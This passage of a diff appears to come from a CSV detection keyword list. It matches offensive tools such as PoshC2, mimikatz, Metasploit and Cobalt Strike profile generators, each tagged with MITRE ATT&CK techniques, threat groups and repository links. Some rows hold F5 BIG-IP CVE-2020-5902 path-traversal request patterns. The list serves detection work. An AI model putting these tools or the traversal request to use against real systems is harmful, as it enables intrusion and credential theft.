T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*posh-delete *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*poshkatz.psd1*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Stealthbits/poshkatz","1","1","N/A","10","3","210","33","2019-12-28T15:53:40Z","2018-10-29T16:07:40Z" -"*posh-project *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*posh-project -*","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*posh-server -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*posh-server -*","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*posh-update *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*posh-project *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*posh-project -*","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*posh-server -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*posh-server -*","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*posh-update *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*POST */tmui/login.jsp/.. /tmui/locallb/workspace/fileSave.jsp*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","377","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z" "*POST *fileName=/tmp/1.txt&content=CVE-2020-5902*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","377","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z" -"*post/windows/gather*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*post_breach_handler.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*post_ex_amsi_disable*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*post_ex_keylogger*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*post_ex_obfuscate*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*post/windows/gather*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*post_breach_handler.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*post_ex_amsi_disable*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*post_ex_keylogger*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*post_ex_obfuscate*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*Post_EX_Process_Name*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" -"*post_ex_smartinject*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*post_ex_spawnto_x64*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*post_ex_spawnto_x86*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*post_ex_smartinject*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*post_ex_spawnto_x64*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 